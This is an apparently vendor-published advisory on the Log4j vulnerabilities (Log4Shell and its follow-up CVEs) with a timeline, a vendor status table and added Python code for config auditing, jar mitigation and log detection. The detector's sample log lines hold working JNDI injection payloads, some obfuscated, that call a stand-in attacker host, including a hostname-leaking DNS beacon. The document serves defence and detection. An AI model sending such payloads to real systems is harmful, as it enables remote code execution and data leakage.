Update 12/20/2021 - Third Log4j Vulnerability Patched Over the Weekend - Over the weekend, the Apache security team released another patch for a new vulnerability in the Log4j logging library. The new issue, tracked as CVE-2021-45105, stems from the incomplete fix for CVE-2021-44228 and affects versions 2.0-beta9 through 2.16.0.
CVE-2021-45105 affects version 2.16.0, which is susceptible to a denial-of-service (DoS) attack: a crafted string that reaches a Context Lookup in the layout pattern of the logging configuration causes uncontrolled recursion, a stack overflow and a crash. Version 2.16.0 was thought to be the final fix for Log4j because it disabled JNDI by default and removed message lookups, closing off the Remote Code Execution (RCE) and Local Code Execution (LCE) paths. However, 2.16.0 does not guard against self-referential lookups, so crafted input that reaches the Context Lookup functionality can still overflow the stack and crash the process.
It’s important to note that CVE-2021-45105 is not a cause for panic. CVE-2021-44228 is exploitable in the default configuration of the logging library, but CVE-2021-45046 and CVE-2021-45105 are not, and are therefore less likely to be exploited. According to security analyst Kevin Beaumont, CVE-2021-45105 only applies in certain “non-default” configurations and it is not being actively exploited in the wild.
As a result of this discovery, Apache has released version 2.17.0 to fix the vulnerability (and 2.12.3 for deployments that are still on Java 7). If you haven’t already, it’s highly recommended that your organization upgrade to 2.17.0. If that’s not an option, upgrade to at least 2.16.0 and, in the PatternLayout of your logging configuration, replace Context Lookups of the form ${ctx:username} or $${ctx:username} with the equivalent Thread Context Map pattern (%X{username}, %mdc{username} or %MDC{username}), and remove any Context Lookups that reference data originating outside the application, such as HTTP headers or user input.
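To make that configuration check concrete, here is an added example in Python (not Avertium's or Apache's code) that audits a log4j2.xml for Context Lookups inside a PatternLayout and rewrites them to the Thread Context Map pattern Apache recommends. The two configurations embedded in it are constructed samples using standard Log4j 2 element names. This is the configuration-side mitigation for CVE-2021-45105 on 2.16.0, not a substitute for upgrading: on 2.15.0 and earlier, a %X pattern fed attacker-controlled MDC values is still exposed to CVE-2021-45046.

```python
"""Audit a log4j2.xml for Context Lookups in PatternLayout and show the fix.

Added example, not Avertium's or Apache's code. It flags the ${ctx:...} and
$${ctx:...} Context Lookups that CVE-2021-45105 (and CVE-2021-45046) rely on
and rewrites them to the Thread Context Map pattern %X{...} that Apache
recommends. Both configurations below are constructed samples.
"""
import re
import xml.etree.ElementTree as ET

# ${ctx:key} or $${ctx:key}; the key name is captured.
CTX_LOOKUP = re.compile(r"\$\$?\{ctx:([^}]+)\}")

# Weak: the layout pattern resolves a Context Lookup at log time, so whatever
# is stored under 'loginId' gets another pass through Log4j's substitution.
VULNERABLE_CONFIG = """\
<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p user=$${ctx:loginId} %c - %m%n"/>
    </Console>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="Console"/></Root>
  </Loggers>
</Configuration>
"""

# Corrected: %X{loginId} prints the same MDC value without a lookup pass.
HARDENED_CONFIG = VULNERABLE_CONFIG.replace("$${ctx:loginId}", "%X{loginId}")


def find_context_lookups(xml_text):
    """Return (location, key) for every Context Lookup found in the config."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        for attr, value in elem.attrib.items():
            for key in CTX_LOOKUP.findall(value):
                findings.append((f"{elem.tag}/@{attr}", key))
        # Patterns may also be given as element text: <Pattern>...</Pattern>
        for key in CTX_LOOKUP.findall(elem.text or ""):
            findings.append((f"{elem.tag}/text", key))
    return findings


def harden_pattern(text):
    """Rewrite ${ctx:key} / $${ctx:key} to %X{key}; works on a pattern or a whole file."""
    return CTX_LOOKUP.sub(lambda m: "%X{" + m.group(1) + "}", text)


if __name__ == "__main__":
    print("vulnerable:", find_context_lookups(VULNERABLE_CONFIG))
    print("hardened:  ", find_context_lookups(harden_pattern(VULNERABLE_CONFIG)))
```

The rewrite is a plain text substitution so that comments and indentation in the file survive; run the finder again on the output before deploying it, and remember that %X only stops the lookup recursion, it does not sanitise what the application put into the MDC.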
Log4j 1.x is not affected by this new vulnerability, because the 1.x branch does not implement the lookup feature at all; but 1.x reached end of life in 2015, receives no security fixes, and has issues of its own (see CVE-2021-4104 below). All organizations still using Log4j 1.x should migrate to Log4j 2 to get the latest updates.
Update (12/14/2021) - Log4Shell: Previous Patch Does NOT Fully Fix - It has been discovered that the fix for CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. The gap has its own identifier, CVE-2021-45046, and at the time of this update was rated lower in severity (CVSS 3.7) than CVE-2021-44228 (CVSS 10.0), because only certain non-default configurations are affected and the known impact was Denial-of-Service (DoS) rather than Remote Code Execution (RCE). (Apache later re-scored CVE-2021-45046 to 9.0 after it was shown to permit information leakage and, in some environments, code execution.) The issue: when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), an attacker who controls data placed into the Thread Context Map (MDC) can craft input containing a JNDI Lookup pattern and cause a denial of service. This affects Log4j versions 2.0-beta9 through 2.15.0.
Examples
Previous mitigations that relied on configuration changes (such as setting log4j2.formatMsgNoLookups=true) do not mitigate this new vulnerability. Upgrading to Log4j 2.16.0 (2.12.2 for Java 7) fixes the issue: it removes support for message lookup patterns and disables JNDI by default. Apache's advisory also lists interim mitigations for deployments that cannot upgrade immediately.
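As an added example (not Avertium's or Apache's code), the Python script below inventories a log4j-core jar by reading the version from its Maven pom.properties, maps that version to the CVEs discussed in this advisory, and applies the interim mitigation Apache documented for deployments that cannot upgrade: deleting the JndiLookup class from the jar, which is what zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class does. The jar it builds is a constructed stand-in with no real bytecode. The version mapping covers the mainline 2.x ranges stated on this page plus the 2.12.2/2.12.3 Java 7 backports; it does not model the 2.3.x Java 6 line.

```python
"""Inventory a log4j-core jar and apply Apache's classpath mitigation.

Added example, not Avertium's or Apache's code. Reads the version from the
jar's Maven pom.properties, maps it to the CVEs this advisory covers, and
deletes org/apache/logging/log4j/core/lookup/JndiLookup.class as Apache's
advisory describes for deployments that cannot upgrade yet. make_sample_jar()
builds a constructed stand-in with no real bytecode; the 2.3.x Java 6
backport line is not modelled.
"""
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(version):
    """'2.14.1' -> (2, 14, 1, 1, ''); a tag such as 2.0-beta9 sorts below 2.0."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(\w+))?", version)
    if not m:
        raise ValueError(f"unrecognised Log4j version: {version}")
    major, minor, patch, tag = m.groups()
    return (int(major), int(minor), int(patch or 0)) + ((0, tag) if tag else (1, ""))


def applicable_cves(version):
    """Ranges stated in this advisory, plus the 2.12.2 / 2.12.3 Java 7 backports."""
    v = parse_version(version)
    if v < parse_version("2.0-beta9"):
        return []  # Log4j 1.x: not affected by these three CVEs
    if v[:2] == (2, 12) and v >= parse_version("2.12.2"):
        return [] if v >= parse_version("2.12.3") else ["CVE-2021-45105"]
    cves = []
    if v <= parse_version("2.14.1"):
        cves.append("CVE-2021-44228")
    if v <= parse_version("2.15.0"):
        cves.append("CVE-2021-45046")
    if v <= parse_version("2.16.0"):
        cves.append("CVE-2021-45105")
    return cves


def jar_version(jar_path):
    """Read the artifact version from the Maven pom.properties inside the jar."""
    with zipfile.ZipFile(jar_path) as zf:
        for line in zf.read(POM_PROPERTIES).decode().splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    raise ValueError(f"no version in {POM_PROPERTIES}")


def has_jndi_lookup(jar_path):
    with zipfile.ZipFile(jar_path) as zf:
        return JNDI_LOOKUP in zf.namelist()


def remove_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class (zipfile cannot delete in place)."""
    tmp = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP:
                dst.writestr(info, src.read(info.filename))
    os.replace(tmp, jar_path)  # atomic swap on the same filesystem
    return not has_jndi_lookup(jar_path)


def audit(jar_path, mitigate=False):
    """Describe the jar; with mitigate=True also strip JndiLookup.class."""
    version = jar_version(jar_path)
    report = {"version": version, "cves": applicable_cves(version),
              "jndi_lookup": has_jndi_lookup(jar_path)}
    if mitigate and report["jndi_lookup"]:
        report["removed"] = remove_jndi_lookup(jar_path)
        report["jndi_lookup"] = has_jndi_lookup(jar_path)
    return report


def make_sample_jar(directory, version):
    """Constructed stand-in for log4j-core-<version>.jar (class-file magic only)."""
    path = os.path.join(directory, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
    return path


def demo(version="2.14.1"):
    """Build the sample jar in a temp dir, audit, mitigate, audit again."""
    with tempfile.TemporaryDirectory() as d:
        jar = make_sample_jar(d, version)
        return audit(jar), audit(jar, mitigate=True)


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after: ", after)
```

Removing the class only closes the JNDI lookup path; it does not change the version string, so a scanner keyed on pom.properties will still report the jar as affected. Record the change alongside the inventory, and remember that the class reappears on the next build or redeploy, so the upgrade still has to happen.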
Additionally, some versions of Apache Log4j contain a different vulnerability. When an attacker has write access to the Log4j configuration, JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data: the attacker can set the TopicBindingName and TopicConnectionFactoryBindingName properties to values that cause JMSAppender to perform JNDI requests, resulting in remote code execution, much as in CVE-2021-44228. However, CVE-2021-4104 only affects Log4j 1.2, which reached end of life in August 2015, and only when JMSAppender is actually configured, which is not the default. Upgrading to Log4j 2.16.0 addresses this issue and numerous others from previous versions of the software.
Update (12/13/2021) - Last Friday, December 10, 2021, we learned that a critical zero-day vulnerability had been found in the Apache Log4j Java-based logging library. CVE-2021-44228, now known as Log4Shell, is an unauthenticated RCE vulnerability that allows complete system takeover on systems running Log4j 2.0-beta9 through 2.14.1: an attacker only needs to get a string carrying a JNDI lookup (the ${jndi: prefix) logged by a vulnerable application.
Over the weekend, further news broke regarding Log4Shell, and we now know that the first attacks were observed two weeks before the vulnerability was publicly disclosed. Mass exploitation began over the weekend and originated from professional crypto-mining and DDoS botnets such as Muhstik and Mirai. Additionally, Microsoft observed Log4Shell being used to deploy web shells and Cobalt Strike beacons, giving attackers persistent backdoor access. Please see below for more information regarding the products we offer and how CVE-2021-44228 affects them.
Avertium engineering teams rolled out IOCs and detections for Log4Shell on Friday night. Our analyst teams were vigilant over the weekend, alerting customers wherever evidence of the exploit was found in their environments. We are currently following up with all of our technology vendors to ensure that all affected applications and services are secure. Please see the table below for details and, where available, a link to each vendor's own statement.
Log4Shell Vendor Status
Vendor | Product | Log4Shell Status | Link / Confirmation
Sophos | Central | Not Impacted |
Sophos | Firewalls | Not Vulnerable |
Sophos | SUM UTM Manager | Not Vulnerable |
SentinelOne | EDR Agent | Not Vulnerable |
SentinelOne | Cloud Manager | Not Vulnerable |
Fortinet | EDR Agent | Not Vulnerable |
Fortinet | EDR Cloud | Remediated |
Fortinet | FortiEDR Portal | Pending Fix 12-18-21 |
Fortinet | FortiSIEM | Mitigated |
LogRhythm | LogRhythm Appliance | Mitigated |
LogRhythm | LogRhythm Cloud | Mitigated |
BlackKite | BlackKite | Not Vulnerable |
HelpSystems | DDI RNA | Not Vulnerable | Confirmed via email
HelpSystems | DDI Cloud Manager | Not Vulnerable | Confirmed via email
Microsoft | Sentinel | Not Vulnerable |
Microsoft | Defender for Endpoint | Not Vulnerable |
AlienVault | USM Appliance | Not Impacted |
AlienVault | USM Anywhere | Log4j present but not vulnerable |
VMware | Carbon Black | Mitigated |
Avertium | Breach Radar | Mitigated | Internal confirmation
Okta | Okta Verify | Not Vulnerable |
Cisco | Cisco AMP | Investigating |
Wazuh | Wazuh | Mitigated | Confirmed via email
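The detections referred to above are Avertium's own. As an added example that is not their content, the Python below shows the core of a Log4Shell log-line check: it collapses the nested-lookup obfuscation attackers used to slip past a plain "${jndi:" string match (${lower:j}, ${::-j}, ${env:NOTSET:-j}) and then extracts the scheme and target of the decoded lookup. The log lines are constructed, and the target hosts use the reserved .invalid domain.

```python
"""Flag Log4Shell probe strings (the ${jndi:...} lookup) in log lines.

Added example, not Avertium's detection content. It resolves the nested-lookup
obfuscation attackers use to dodge a plain '${jndi:' match (${lower:j},
${::-j}, ${env:NOTSET:-j}) before matching, then pulls out scheme and target.
All log lines are constructed; targets use the reserved .invalid TLD.
"""
import re

INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")          # a ${...} with nothing nested
JNDI_PREFIX = re.compile(r"\$\{jndi:", re.IGNORECASE)  # Log4j lookup keys are case-insensitive


def _resolve(body):
    """Evaluate one innermost lookup the way the attacker expects Log4j to."""
    prefix, _, rest = body.partition(":")
    prefix = prefix.lower()
    if prefix == "jndi":
        return "${" + body + "}"        # keep: this is what we want to surface
    if prefix == "lower":
        return rest.lower()
    if prefix == "upper":
        return rest.upper()
    if ":-" in body:                    # default-value syntax: ${env:NOTSET:-j}, ${::-j}
        return body.split(":-", 1)[1]
    return "${" + body + "}"            # ${date:...}, ${hostName}, ...: leave as-is


def deobfuscate(text, max_rounds=16):
    """Resolve lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def _lookup_end(text, start):
    """Index of the '}' closing the ${...} that begins at text[start] (nesting-aware)."""
    depth = 0
    for i in range(start, len(text)):
        if text.startswith("${", i):
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return i
    return len(text) - 1


def detect(line):
    """Return the decoded JNDI payload details, or None if the line is clean."""
    decoded = deobfuscate(line)
    m = JNDI_PREFIX.search(decoded)
    if not m:
        return None
    payload = decoded[m.start():_lookup_end(decoded, m.start()) + 1]
    scheme, _, target = payload[len("${jndi:"):-1].partition("://")
    return {"scheme": scheme.lower(), "target": target,
            "payload": payload, "obfuscated": decoded != line}


def scan(lines):
    """(line number, finding) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        finding = detect(line)
        if finding:
            hits.append((n, finding))
    return hits


# Constructed access-log lines: one clean request, four probe variants, and a
# benign ${date:...} string that must not trigger.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:22:14:01 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:22:14:03 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.invalid:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:22:14:05 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:l}dap://attacker.invalid/b}"',
    '10.0.0.9 - - [10/Dec/2021:22:14:07 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.invalid/c} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:22:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NOTSET:-j}ndi:dns://${hostName}.attacker.invalid/d}"',
    '10.0.0.7 - - [10/Dec/2021:22:14:11 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOG):
        print(n, hit)
```

Run it over web-server access logs, proxy logs, and any field an application echoes into its own logs (User-Agent, X-Forwarded-For, form parameters). A hit proves a probe reached a log, not that the host was vulnerable, so pair it with outbound-connection telemetry to the decoded target; the dns:// variant with ${hostName} in the target is a reconnaissance beacon, and a DNS query for that name from the logged host is the confirmation to look for.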
Sources:
Log4Shell attacks began two weeks ago, Cisco and Cloudflare say (The Record by Recorded Future)
New zero-day exploit for Log4j Java library is an enterprise nightmare (bleepingcomputer.com)
Microsoft’s Response to CVE-2021-44228 Apache Log4j 2 (Microsoft Security Response Center)
SentinelOne (sentinelone.com)
Restrict LDAP access via JNDI by rgoers, Pull Request #608, apache/logging-log4j2 (GitHub)
Advisory: Log4j zero-day vulnerability AKA Log4Shell (CVE-2021-44228) (Sophos)
CVE-2021-45046 (mitre.org)
Log4j – Apache Log4j Security Vulnerabilities (logging.apache.org)
Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability (thehackernews.com)
Log4j Vulnerability CVE-2021-45105: What You Need to Know (WhiteSource, whitesourcesoftware.com)
The Log4j saga: New vulnerabilities and attack vectors discovered (Help Net Security)
Tenable (tenable.com)
Related Reading:
Wormable Security Vulnerability Found in Several HP Printer Models